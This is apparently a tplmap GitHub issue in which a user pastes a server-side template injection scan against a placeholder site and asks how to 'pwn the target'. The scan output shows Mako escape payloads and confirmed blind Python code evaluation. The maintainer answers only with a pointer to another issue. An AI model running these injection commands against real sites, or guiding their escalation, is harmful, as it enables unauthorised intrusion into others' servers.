[-][checks] No system command execution capabilities have been detected on the target.

[its0x08]

Any idea on this ?! How do I continue to pwn the target or at least to confirm that the vuln is not false positive?!

root@kaLi:~/Desktop/scripts/tplmap# python tplmap.py -u 'https://www.target.com/category/movie*' --level 5 --os-cmd 'pwd' -e mako
[+] Tplmap 0.4
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if URL parameter 'url' is injectable
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing }* code context escape with 130 variations
[+] Mako plugin is testing %>*<%# code context escape with 130 variations
[+] Mako plugin is testing #\n*\n code context escape with 130 variations
[+] Mako plugin is testing </%def>*<%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin is testing </%block>*<%block> code context escape with 130 variations
[+] Mako plugin is testing </%text>*<%text> code context escape with 130 variations
[+] Mako plugin is testing blind injection
[+] Mako plugin is testing }* code context escape with 130 variations
[+] Mako plugin is testing %>*<%# code context escape with 130 variations
[+] Mako plugin is testing #\n*\n code context escape with 130 variations
[+] Mako plugin is testing </%def>*<%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin has confirmed blind injection
[+] Tplmap identified the following injection point:

  URL parameter: url
  Engine: Mako
  Injection: </%def>*<%def name="t(x)">
  Context: code
  OS: undetected
  Technique: blind
  Capabilities:

   Shell command execution: no
   Bind and reverse shell: no
   File write: no
   File read: no
   Code evaluation: ok, python code (blind)

[-][checks] No system command execution capabilities have been detected on the target.

[epinna]

See #35.